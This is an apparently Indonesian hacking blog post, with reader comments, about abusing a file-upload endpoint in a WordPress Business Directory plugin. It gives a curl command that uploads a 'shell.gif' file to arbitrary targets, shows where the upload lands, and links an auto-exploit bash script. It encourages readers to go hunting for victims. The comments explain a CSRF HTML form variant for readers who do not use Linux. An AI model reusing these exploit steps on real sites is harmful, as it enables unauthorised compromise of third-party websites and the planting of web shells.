Author: Jingklong ( Bahari Trouble Maker )
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload
Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload
| ( Vuln Target ) |
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"
Uplod file anda dengan format .gif/.jpg/.png
Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif
Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9
Oke, selamat mencari target :D




8 comments:
bang agus,ini harus pakek linux ya? kalo gk pakek gimana bang?
gapake linux juga bisa, pake csrf nya
.php gabisa ya om?
gabisa gan, cuma .gif aja
Bang csrf dari mana ,sorry neubi
itu ada ss scriptnya gan, tulis ulang aja :v
simpen dengan extensi/format .html
taro aja di local disknya, abis itu buka filenya
ganti bagian target="http://targetlu.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload" isi target lu
bang ajarin tolongin ane cara biar root terminal devie kayagitu
Post a Comment